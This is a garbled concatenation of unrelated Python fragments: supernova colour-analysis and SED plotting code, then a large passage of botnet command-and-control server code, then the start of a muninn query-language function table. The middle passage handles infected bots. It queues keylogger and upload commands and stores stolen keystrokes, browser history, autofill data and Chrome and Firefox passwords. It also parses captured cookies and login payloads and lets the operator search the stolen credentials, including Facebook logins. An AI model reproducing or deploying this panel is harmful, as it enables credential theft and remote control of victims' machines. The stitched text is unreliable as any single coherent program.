'HST_CANDELS1_aidan.dat',
'HST_CANDELS1_adams.dat',
'HST_CANDELS1_vanburen.dat',
]
fig = pl.figure( 5, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
fig = pl.figure( 6, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist3) :
colorCheck( datfile, 5, irow, [5,6] )
def colorcheck_midz4():
datfilelist4 = [
'HST_CANDELS1_mondale.dat',
'HST_CANDELS1_lbj.dat',
'HST_CANDELS1_lincoln.dat',
'HST_CANDELS1_mikulski.dat',
'HST_CANDELS1_madison.dat',
]
fig = pl.figure( 7, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
fig = pl.figure( 8, figsize=(19,12) )
pl.clf()
fig.subplots_adjust( left=0.05, bottom=0.04, right=0.96, top=0.93, wspace=0.0, hspace=0.20 )
for irow, datfile in zip( range(5), datfilelist4) :
colorCheck( datfile, 5, irow, [7,8] )
def colorCheck(datfile, nrow, irow, ifiglist=[1,2], clobber=False, verbose=1):
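    """ Compare the observed peak color(s) of one SN against simulated
    Ia / Ib/c / II populations: for each red band (H or J) observed near
    peak, plot histograms of the simulated W,V,I,Z minus red-band colors
    and overlay the observed color as a shaded band, filling row irow of
    the nrow x 4 grid in the figures listed in ifiglist. """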
sn = stardust.SuperNova(datfile )
sn.getClassSim( 'HST_colormag', Nsim=2000, dustmodel='mid', simpriors=True, clobber=clobber, verbose=verbose )
pkbands = np.unique([ sn.FLT[i] for i in range(len(sn.MJD)) if abs(sn.MJD[i]-sn.pkmjdobs)<=sn.pkmjdobserr ])
sn.ClassSim.Ia.samplephot( sn.pkmjdobs, tmatch=sn.pkmjdobserr, bandlist=pkbands )
sn.ClassSim.Ibc.samplephot( sn.pkmjdobs, tmatch=sn.pkmjdobserr, bandlist=pkbands )
sn.ClassSim.II.samplephot( sn.pkmjdobs, tmatch=sn.pkmjdobserr, bandlist=pkbands )
ipk = np.where( np.abs(sn.MJD - sn.pkmjdobs)< sn.pkmjdobserr )[0]
for ifig,redfilt in zip(ifiglist,['H','J']) :
if redfilt not in pkbands : continue
fig = pl.figure( ifig )
ax1 = fig.add_subplot( nrow, 4, 1 )
RpkSimIa = sn.ClassSim.Ia.__dict__['%s%i'%(redfilt,int(sn.pkmjdobs))]
RpkSimIbc = sn.ClassSim.Ibc.__dict__['%s%i'%(redfilt,int(sn.pkmjdobs))]
RpkSimII = sn.ClassSim.II.__dict__['%s%i'%(redfilt,int(sn.pkmjdobs))]
ipkR = np.where( sn.FLT[ipk] == redfilt )[0]
if not len(ipkR) : continue
snR = sn.MAG[ipk][ipkR][0]
snRerr = sn.MAGERR[ipk][ipkR][0]
for icol,bluefilt in zip( range(4),['W','V','I','Z']):
ax = fig.add_subplot( nrow, 4, irow*4 + icol + 1, sharex=ax1 )
if icol == 0 : ax.set_ylabel(sn.nickname)
if irow == 0 : ax.set_title( '%s-%s'%(bluefilt,redfilt) )
if bluefilt not in pkbands : continue
ipkB = np.where( sn.FLT[ipk] == bluefilt )[0]
if not len(ipkB) : continue
snB = sn.MAG[ipk][ipkB][0]
snBerr = sn.MAGERR[ipk][ipkB][0]
BpkSimIa = sn.ClassSim.Ia.__dict__['%s%i'%(bluefilt,int(sn.pkmjdobs))]
BpkSimIbc = sn.ClassSim.Ibc.__dict__['%s%i'%(bluefilt,int(sn.pkmjdobs))]
BpkSimII = sn.ClassSim.II.__dict__['%s%i'%(bluefilt,int(sn.pkmjdobs))]
CpkSimIa = BpkSimIa - RpkSimIa
CpkSimIbc = BpkSimIbc - RpkSimIbc
CpkSimII = BpkSimII - RpkSimII
CIa,cbins = np.histogram( CpkSimIa, bins=np.arange(-5,12,0.2) )
CIbc,cbins = np.histogram( CpkSimIbc, bins=np.arange(-5,12,0.2) )
CII,cbins = np.histogram( CpkSimII, bins=np.arange(-5,12,0.2) )
ax.plot( cbins[:-1], CIa, 'r-', drawstyle='steps-mid' )
ax.plot( cbins[:-1], CIbc, 'g-', drawstyle='steps-mid' )
ax.plot( cbins[:-1], CII, 'b-', drawstyle='steps-mid' )
snC = snB - snR
snCerr = np.sqrt( snBerr**2 + snRerr**2 )
snCmin = snC - snCerr
snCmax = snC + snCerr
if snBerr<0 : snCmin = snC
if snRerr<0 : snCmax = snC
ymin,ymax=ax.get_ylim()
snCbar = patches.Rectangle( [ snCmin, 0.0], snCmax-snCmin, ymax, color='0.5', alpha=0.5, zorder=-100 )
ax.add_patch( snCbar )
ax.set_xlim([-2,6])
fig.suptitle( '(W,V,I,Z)-%s band color distributions'%redfilt )
def sedcheck( z=0.68, days=[-10,0,20], cctype='Ibc'):
""" plot the rest-frame SED for Ia , Ib/c and II SNe,
    overlaying the broad-band filter curves (blue-shifted)
to see the origin of the color distributions.
"""
fig = pl.figure(1,figsize=(19,12))
pl.clf()
ncol = len(days)
for icol,day in zip(range(ncol),days) :
# reagan: z=0.68, day=-10
# buchanan: z=0.68, day=+20
fig.add_subplot( 1,ncol,icol+1)
plotsed( sedfile='Hsiao07.extrap.dat', day=day, z=0.68, color='r',ls='-',lw=2 )
if cctype=='II': plotIIseds( day=day,z=0.68)
elif cctype=='Ibc': plotIbcseds( day=day,z=0.68)
elif cctype in ['CC','all']:
plotIIseds( day=day,z=0.68)
plotIbcseds( day=day,z=0.68)
plotbands( 'WVIJ', z=z )
ax = pl.gca()
ax.set_xlim(1800,10000)
ax.text( 0.95, 0.95, 't = %i'%int(day), transform=ax.transAxes, ha='right',va='top',fontsize='x-large' )
def plotIIseds( day=0, z=0.68 ):
plotsed( sedfile='SDSS-000018.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-003818.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-013376.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014450.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014599.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015031.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015320.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015339.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-017564.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-017862.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018109.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018297.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018408.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018441.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018457.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018590.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018596.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018700.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018713.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018734.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018793.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018834.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-018892.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-020038.SED', day=day, z=z, color='b',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-012842.SED', day=day, z=z, color='c',ls='-',lw=1 )
plotsed( sedfile='SDSS-013449.SED', day=day, z=z, color='c',ls='-',lw=1 )
plotsed( sedfile='Nugent+Scolnic_IIL.SED', day=day, z=z, color='m',ls='-',lw=1 )
def plotIbcseds( day=0, z=0.68 ):
plotsed( sedfile='CSP-2004gv.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2006ep.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2007Y.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-000020.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-002744.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014492.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-019323.SED', day=day, z=z, color='g',ls='-',lw=0.5 )
plotsed( sedfile='SNLS-04D4jv.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2004fe.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='CSP-2004gq.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-004012.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-013195.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-014475.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-015475.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SDSS-017548.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
plotsed( sedfile='SNLS-04D1la.SED', day=day, z=z, color='c',ls='-',lw=0.5 )
def plotsed( sedfile = 'Hsiao07.extrap.dat', day=0, z=0.68, **kwarg ):
""" plot the sed, normalizing such that the integrated J band = 1 """
from scipy import interp
w,f = getsed( sedfile, day=day )
wJ,fJ = getbandpass( 'J' )
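    # interpolate the (blue-shifted) J bandpass onto the SED wavelength grid and integrate to get the normalization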
fJint = interp( w, wJ/(1+z), fJ, left=0, right=0 )
dw = np.diff(w).mean()
normfactor = (fJint * f).sum() * dw
ax1 = pl.gca()
fmag = -2.5*np.log10( np.where( f>0, f/normfactor, np.ones(len(f))*1e-6) ) + 25
ax1.plot( w, fmag, zorder=20, **kwarg )
ax1.set_xlim(1800,10000)
#ax1.set_yticks([])
ax1.set_ylim(38,27)
ax1.set_ylabel('-2.5 log( f ) + constant' )
ax1.set_xlabel('rest wavelength' )
def plotbands( bands='WVIJ', z=0.68 ):
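    """ Overlay the blue-shifted broad-band filter transmission curves on a twin y-axis of the current plot. """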
wJ,fJ = getbandpass( 'J' )
wW,fW = getbandpass( 'W' )
wV,fV = getbandpass( 'V' )
wI,fI = getbandpass( 'I' )
ax1 = pl.gca()
ax2 = ax1.twinx()
if 'J' in bands : ax2.fill_between( wJ/(1+z), fJ, color='r', zorder=-20, alpha=0.3 )
if 'V' in bands : ax2.fill_between( wV/(1+z), fV, color='b', zorder=-20, alpha=0.3 )
if 'I' in bands : ax2.fill_between( wI/(1+z), fI, color='g', zorder=-20, alpha=0.3 )
if 'W' in bands : ax2.fill_between( wW/(1+z), fW, color='k', zorder=-40, alpha=0.3 )
ax2.set_ylim(0,0.3)
ax2.set_yticks([])
def getbandpass( band='J' ):
srcdir = sys.argv[0]
if srcdir.endswith('python'): srcdir = __file__
filtdir = os.path.abspath( os.path.dirname( srcdir ) +'/../figs/FILTER' )
if band=='V':
return( np.loadtxt( os.path.join(filtdir,'ACS_WFC_F606W.dat'), unpack=True ) )
elif band=='I':
return( np.loadtxt( os.path.join(filtdir,'ACS_WFC_F814W.dat'), unpack=True ) )
elif band=='Z':
return( np.loadtxt( os.path.join(filtdir,'ACS_WFC_F850LP.dat'), unpack=True ) )
elif band=='W':
return( np.loadtxt( os.path.join(filtdir,'WFC3_UVIS_F350LP.dat'), unpack=True ) )
elif band=='J':
return( np.loadtxt( os.path.join(filtdir,'WFC3_IR_F125W.dat'), unpack=True ) )
elif band=='H':
return( np.loadtxt( os.path.join(filtdir,'WFC3_IR_F160W.dat'), unpack=True ) )
def getsed( sedfile = 'Hsiao07.extrap.dat', day=None) :
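    """ Read a supernova SED template, searching the SNDATA_ROOT snsed
    directories if the file is not found locally.  If day is given, return
    the wavelength and flux arrays for epochs within 0.9 days of it;
    otherwise return dictionaries of wavelength and flux keyed by day. """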
if not os.path.isfile( sedfile ) :
sedfile = os.path.join( sndataroot, 'snsed/%s'%sedfile)
if not os.path.isfile( sedfile ) :
sedfile = os.path.join( sndataroot, 'snsed/non1a/%s'%os.path.basename(sedfile) )
if not os.path.isfile( sedfile ) :
print("cannot find %s"%os.path.basename(sedfile) )
d,w,f = np.loadtxt( sedfile, unpack=True )
if day!=None :
dout = d[ np.where( np.abs(d-day)<0.9 ) ]
wout = w[ np.where( np.abs(d-day)<0.9 ) ]
fout = f[ np.where( np.abs(d-day)<0.9 ) ]
return( wout, fout )
else :
        days = np.unique( d )
dout = dict( [ [day, d[ np.where( d==day ) ]] for day in days ] )
wout = dict( [ [day, w[ np.where( d==day ) ]] for day in days ] )
        fout = dict( [ [day, f[ np.where( d==day ) ]] for
Path(target0)
if my_file.is_file():
with open(target0, "r") as d:
if file_is_empty(target0)== True:
html = html.replace("{{KL}}","No Keystrokes Stored.")
else:
switch = False
for line in d:
CURRENT_WINDOW = ''
TIME_WINDOW = ''
STROKES = ''
tabletorpl = ''
tdpreset = '''<table class="table_info"><tr>
<th>Window Title Name</th>
<td>{{WTN}}</td>
</tr>
<tr>
<th>Time</th>
<td>{{TM}}</td>
</tr><tr>
<th>Keys Pressed</th>
<td>{{STK}}</td>
</tr></table><br><br>{{END}}'''
if line.startswith("["):
CURRENT_WINDOW = line.split("]")[0]
CURRENT_WINDOW = CURRENT_WINDOW.replace("[","")
tabletorpl = tdpreset.replace("{{WTN}}",CURRENT_WINDOW)
TIME_WINDOW = line.split("@", 2)[2]
TIME_WINDOW = TIME_WINDOW.split("|||")[0]
tabletorpl = tabletorpl.replace("{{TM}}",TIME_WINDOW)
STROKES = line.split("|||")[1]
tabletorpl = tabletorpl.replace("{{STK}}",STROKES)
if switch == True:
html = html.replace("{{END}}",tabletorpl)
else:
html = html.replace("{{KL}}",tabletorpl)
switch = True
switch = True
else:
pass
else:
html = html.replace("{{KL}}","No Keystrokes Stored.")
html = html.replace("{{botid}}", botid)
html = html.replace("{{END}}", "")
return html
@cherrypy.expose
@require_admin
def dbpass(self,*argv):
SaveLog("REQUEST : 200 [ Ok ] | Database.html")
with open("html/DbPass.html", "r") as f:
html = f.read()
try:
file = open("TempDir/tmp.txt", "r")
buffer_ = file.read()
if buffer_ == "":
buffer_ = "No matches found for this research."
buffer_ = buffer_.replace("\n","<br>")
buffer_ = buffer_.replace("Website:","<b>Website</b>:")
buffer_ = buffer_.replace("Username:","<b>Username</b>:")
buffer_ = buffer_.replace("Password:","<b>Password</b>:")
buffer_ = buffer_.replace("DumpDir/","")
except :
buffer_ = ""
html = html.replace("{{results}}",buffer_)
try:
os.remove("TempDir/tmp.txt")
except:
pass
return html
@cherrypy.expose
@require_admin
def chrome(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Chrome.html -> %s " % botid)
html = ''
krc = ''
hic = ''
afc = ''
mln = 1000
with open("html/Chrome.html", "r") as f:
html = f.read()
target0 = "DumpDir/%s/KRC.txt" % botid
target1 = "DumpDir/%s/HIC.txt" % botid
target2 = "DumpDir/%s/AFC.txt" % botid
try:
max_counter0 = 0
max_counter1 = 0
max_counter2 = 0
html = html.replace("{{botid}}",botid)
f = codecs.open(target0, encoding='utf-8')
for line in f:
if max_counter0 == mln:
krc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target0)
break
krc += repr(line)
max_counter0 += 1
krc = krc.replace("'","'")
krc = krc.replace("\\n'","<br>")
krc = krc.replace("u'","")
html = html.replace("{{KRC}}",krc)
h = codecs.open(target1, encoding='utf-8')
for line in h:
if max_counter1 == mln:
hic += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target1)
break
hic += repr(line)
max_counter1 += 1
hic = hic.replace("'","'")
hic = hic.replace("u'","")
hic = hic.replace("\\n'","<br>")
html = html.replace("{{HIC}}",hic)
y = codecs.open(target2, encoding='utf-8')
for line in y:
if max_counter2 == mln:
afc += "<br><u>FILE TOO BIG ! TO AVOID BROWSER CRASH YOU CAN SEE ONLY THE FIRST %s LINES , CHECK THE FILE %s TO SEE THE FULL DATA.</u>" % (str(mln),target2)
break
afc += repr(line)
max_counter2 += 1
afc = afc.replace("'","'")
afc = afc.replace("u'","")
afc = afc.replace("\\n'","<br>")
afc = afc.replace(""",'"')
html = html.replace("{{AFC}}",HTMLParser.HTMLParser().unescape(afc))
except:
html = html.replace("{{KRC}}","Nothing Here.")
html = html.replace("{{HIC}}","Nothing Here.")
html = html.replace("{{AFC}}","Nothing Here.")
return html
@cherrypy.expose
@require_admin
def getcache(self, botid):
SaveLog("REQUEST : 200 [ Ok ] | Cache.html => %s" % botid)
with open("html/Cache.html", "r") as f:
html = f.read()
final_html = ''
filepath = "DumpDir/%s/getauth.txt" % botid
try:
with open(filepath,"r") as t:
everything = t.read()
if everything != "":
for item in everything.split("]]]==="):
if "===[[[" in item:
TABLE_PRESET = '''<table>
<tr>
<th>Request Type:</th>
<td>{{Request-Type}}</td>
</tr>
<tr>
<th>Host-Website:</th>
<td style="color:red">{{Host}}</td>
</tr>
<tr>
<th>User Agent:</th>
<td>{{User-Agent}}</td>
</tr>
<tr>
<th>Language:</th>
<td>{{Language}}</td>
</tr>
<tr>
<th>Hour:</th>
<td>{{Time}}</td>
</tr>
<tr>
<th>Cookie:</th>
<td>{{Cookie}}</td>
</tr>
<th>Payload-Credentials:</th>
<td style="color:red">{{Payload}}</td>
</tr>
</table><br>'''
TABLE_UNSORTED_PACKET = '''<table>
<tr>
<th> ( Unsorted Packet ) Packet Content:</th>
<td>{{pkt}}</td>
</tr>
</table><br>'''
buffer = item [ item.find("===[[[")+len("===[[[") : ]
COMPLETE_PACKET = ''
REQUEST_TYPE = ''
HOST = ''
USER_AGENT = ''
LANGUAGE = ''
HOUR = ''
COOKIE = ''
PAYLOAD = ''
COMPLETE_PACKET = find_between( buffer, "((", "))" )
REQUEST_TYPE = COMPLETE_PACKET.split(" ")[0]
HOST = find_between( COMPLETE_PACKET , "Host:", "\n" )
HOST = HOST.replace(" ","")
USER_AGENT = find_between( COMPLETE_PACKET , "User-Agent:", "\n" )
USER_AGENT = USER_AGENT.replace(" ","")
LANGUAGE = find_between( COMPLETE_PACKET , "Accept-Language:", "," )
LANGUAGE = LANGUAGE.replace(" ","")
HOUR = COMPLETE_PACKET.split("{{{")[1]
COOKIE = find_between( COMPLETE_PACKET , "Cookie:", "auth_key" )
COOKIE = COOKIE.replace(" ","")
PAYLOAD = find_between( COMPLETE_PACKET , "auth_key=" , "{{{")
TABLE_PRESET = TABLE_PRESET.replace("{{Request-Type}}",REQUEST_TYPE)
TABLE_PRESET = TABLE_PRESET.replace("{{Host}}",HOST)
TABLE_PRESET = TABLE_PRESET.replace("{{User-Agent}}",USER_AGENT)
TABLE_PRESET = TABLE_PRESET.replace("{{Language}}",LANGUAGE)
TABLE_PRESET = TABLE_PRESET.replace("{{Time}}",HOUR)
TABLE_PRESET = TABLE_PRESET.replace("{{Cookie}}",COOKIE)
TABLE_PRESET = TABLE_PRESET.replace("{{Payload}}",PAYLOAD)
final_html += TABLE_PRESET
if PAYLOAD == '':
try:
TABLE_PRESET = ''
TABLE_PRESET = TABLE_UNSORTED_PACKET.replace("{{pkt}}",COMPLETE_PACKET)
except:
pass
except:
final_html = 'File getauth.txt not found!'
html = html.replace("{{botid}}",botid)
kwords = ['password','username','pwd','usr','pass','user','email','referer']
try:
for word in kwords:
try:
TABLE_PRESET = TABLE_PRESET.replace(word,'<span style="color:black;background-color:#f4eb42;"><b>%s</b></span>'%word)
except:
pass
final_html = TABLE_PRESET
except:
pass
html = html.replace("{{Table_preset}}",final_html)
return html
class API(object):
@cherrypy.expose
@require_admin
def passupdate_setting(self, password=''):
SaveLog("REQUEST : 200 [ Ok ] | Admin password updated.")
set_admin_password(password)
@cherrypy.expose
@require_admin
def removebot(self, botid):
global BUFFER_BOT_REMOVED
cmd = "removeme"
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("Removing Bot.")
exec_DB("DELETE FROM bots WHERE name=?",(html_escape(botid),))
BUFFER_BOT_REMOVED.append(botid)
@cherrypy.expose
@require_admin
def klog(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), "keylogger %s" % cmd , False, html_escape(botid)))
@cherrypy.expose
def pop(self, botid, sysinfo, ip):
global BUFFER_BOT_REMOVED
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
bot = query_DB("SELECT * FROM bots WHERE name=?", (botid,))
if not bot:
if botid in BUFFER_BOT_REMOVED :
SaveLog("Bot Removed Tried To Connect: botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
BUFFER_BOT_REMOVED = []
else:
exec_DB("INSERT INTO bots VALUES (?, ?, ?, ?)", (html_escape(botid), time.time(), ip, html_escape(sysinfo)))
SaveLog("Storing New Bot : botid => %s - sysinfo => %s - ip => %s" % (botid, sysinfo, ip))
if not os.path.exists("DumpDir/%s" % botid):
os.makedirs("DumpDir/%s" % botid)
else:
exec_DB("UPDATE bots SET lastonline=? where name=?", (time.time(), botid))
cmd = query_DB("SELECT * FROM commands WHERE bot=? and sent=? ORDER BY date", (botid, 0))
if cmd:
exec_DB("UPDATE commands SET sent=? where id=?", (1, cmd[0][0]))
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), "> " + cmd[0][2], html_escape(botid)))
return cmd[0][2]
else:
return ""
@cherrypy.expose
def worldupdate(self):
thread = Thread(target = worldgen)
thread.start()
thread.join()
@cherrypy.expose
def report(self, botid, output):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
if "{{info}}" in html_escape(output):
md_buffer = html_escape(output).split("{{info}}")[1]
out_file = open("DumpDir/%s/info.txt"% html_escape(botid),"w")
md_buffer = md_buffer.replace("{{info}}","")
out_file.write(md_buffer)
out_file.close()
elif "MD-STATUS" in html_escape(output):
md_buffer = html_escape(output).split(":")[1]
filename = "Logs/MassDownloadReport.txt"
out_file = open(filename,"a")
current_time = strftime("[%H-%M-%S_%d-%m-%Y]", gmtime())
texttowrite= str(current_time) + "\t[ " + str(html_escape(botid)) + " ] [ MD-STATUS:%s - OK ]\n" % str(md_buffer)
out_file.write(texttowrite)
out_file.close()
elif "{{KEYLOGS}}" in html_escape(output):
out_file = open("DumpDir//%s//Keystrokes.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("{{KEYLOGS}}","")
out_file.write(buffer_html)
out_file.close()
SaveLog("Updating Keystrokes.")
elif "KRC{{{" in html_escape(output):
if not os.path.exists("DumpDir//%s" % html_escape(botid)):
os.makedirs("DumpDir//%s"% html_escape(botid))
out_file = open("DumpDir//%s//KRC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("KRC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Keywords Searched.")
elif "HIC{{{" in html_escape(output):
out_file = open("DumpDir//%s//HIC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("HIC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => History.")
elif "AFC{{{" in html_escape(output):
out_file = open("DumpDir//%s//AFC.txt" % html_escape(botid) ,"w")
buffer_html = ''
buffer_html = html_escape(output).replace("AFC{{{","")
out_file.write(buffer_html.encode('utf-8'))
out_file.close()
SaveLog("Storing Chrome Data => Autofill Fields.")
elif "{{getrequestauth}}" in html_escape(output):
out_file = open("DumpDir//%s//getauth.txt" % html_escape(botid) ,"a")
buffer_html = ""
buffer_html = html_escape(output).replace("{{getrequestauth}}","")
out_file.write("===[[[((" + buffer_html + "))]]]===\n\n")
out_file.close()
SaveLog("Storing auth GET request.")
elif "CHROME PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("CHROME PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s.txt"% html_escape(botid),"w")
out_file.write("\nCHROME PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Chrome Passwords.")
elif "FIREFOX PASSWORDS :" in html_escape(output):
buffer_html = ""
buffer_html = html_escape(output).replace("FIREFOX PASSWORDS :","")
buffer_html = buffer_html.replace("'" , "'")
out_file = open("DumpDir//%s-firefox.txt" % html_escape(botid),"w")
out_file.write("\nFIREFOX PASSWORDS : =================================================================================\n")
out_file.write(buffer_html)
out_file.close()
SaveLog("Storing Firefox Passwords.")
else:
exec_DB("INSERT INTO output VALUES (?, ?, ?, ?)", (None, time.time(), html_escape(output), html_escape(botid)))
@cherrypy.expose
@require_admin
def push(self, botid, cmd):
if not validate_botid(botid):
raise cherrypy.HTTPError(403)
exec_DB("INSERT INTO commands VALUES (?, ?, ?, ?, ?)", (None, time.time(), cmd, False, html_escape(botid)))
SaveLog("REQUEST : 200 [ Ok ] | push.html")
if "upload" in cmd:
uploads = cmd[cmd.find("upload"):]
up_cmds = [i for i in uploads.split("upload ") if i]
for upload in up_cmds:
end_pos = upload.find(";")
while end_pos > 0 and cmd[end_pos - 1] == '\\':
end_pos = cmd.find(";", end_pos + 1)
upload_filename = upload
if end_pos != -1:
upload_filename = upload_filename[:end_pos]
pending_uploads.append(os.path.basename(upload_filename))
if cmd.startswith("screenshot"):
pending_uploads.append("screenshot")
@cherrypy.expose
@require_admin
def sortKW(self, keyword):
SaveLog("Request Password DB => Sorting By KeyWord : %s " % keyword)
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if keyword in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd = data[i+4].split("Password:")[1]
argc_buffer += "--[ Result <b>%s</b> in <b>%s</b>\n\n" % (str(index_result),str(fileName))
argc_buffer += "<b>Website </b>: " + website.rstrip() + "\n"
argc_buffer += "<b>Username </b>: " + usr.rstrip() +"\n"
argc_buffer += "<b>Password </b>: " + pwd.rstrip() +"\n\n"
index_result += 1
out_file = open("TempDir/tmp.txt","w")
out_file.write(argc_buffer)
out_file.close()
data.close()
@cherrypy.expose
@require_admin
def sortIP(self, ip):
try:
write_buffer = ''
write_buffer0 = ''
file = open('DumpDir/%s.txt' %ip, 'r')
write_buffer += "--[ Results in <b>%s</b> \n\n" % ip
write_buffer_0 = file.read()
write_buffer_0 = write_buffer_0.replace("[*] All Firefox Passwords Dumped .","")
write_buffer_0 = write_buffer_0.replace("Website:","<b>Website</b>:")
write_buffer_0 = write_buffer_0.replace("Username:","<b>Username</b>:")
write_buffer_0 = write_buffer_0.replace("Password:","<b>Website</b>:")
write_buffer += write_buffer_0
out_file = open("TempDir/tmp.txt","w")
out_file.write(write_buffer)
out_file.close()
SaveLog("Request Password DB => Sorting By IP : %s " % ip)
except:
SaveLog("Error : Sorting by IP , No File Found.")
@cherrypy.expose
@require_admin
def sortSel(self, mode):
if mode == "face":
SaveLog("Request Password DB => Printing All Facebook Passwords")
argc_buffer = ""
index_result = 0
list_of_files = glob.glob('DumpDir/*.txt')
if not list_of_files:
out_file = open("TempDir/tmp.txt","w")
out_file.write("")
out_file.close()
for fileName in list_of_files:
data = open(fileName).readlines()
for i in range(len(data)):
if "facebook" in data[i] or "Facebook" in data[i]:
if "," in data[i]:
argc_buffer = data[i]
else:
website = data[i].split("Website:")[1]
usr = data[i+2].split("Username:")[1]
pwd | |
#
# Copyright (C) 2014-2019 S[&]T, The Netherlands.
#
from __future__ import absolute_import, division, print_function
from muninn._compat import string_types as basestring
import copy
import datetime
import re
import uuid
import muninn.geometry as geometry
from muninn.enum import Enum
from muninn.exceptions import *
from muninn.function import Prototype, FunctionTable
from muninn.schema import *
from muninn.visitor import Visitor
#
# Table of all supported operators and functions.
#
function_table = FunctionTable()
#
# Logical operators.
#
function_table.add(Prototype("not", (Boolean,), Boolean))
function_table.add(Prototype("and", (Boolean, Boolean), Boolean))
function_table.add(Prototype("or", (Boolean, Boolean), Boolean))
#
# Comparison operators.
#
function_table.add(Prototype("==", (Long, Long), Boolean))
function_table.add(Prototype("==", (Long, Integer), Boolean))
function_table.add(Prototype("==", (Integer, Long), Boolean))
function_table.add(Prototype("==", (Integer, Integer), Boolean))
function_table.add(Prototype("==", (Real, Real), Boolean))
function_table.add(Prototype("==", (Real, Long), Boolean))
function_table.add(Prototype("==", (Long, Real), Boolean))
function_table.add(Prototype("==", (Real, Integer), Boolean))
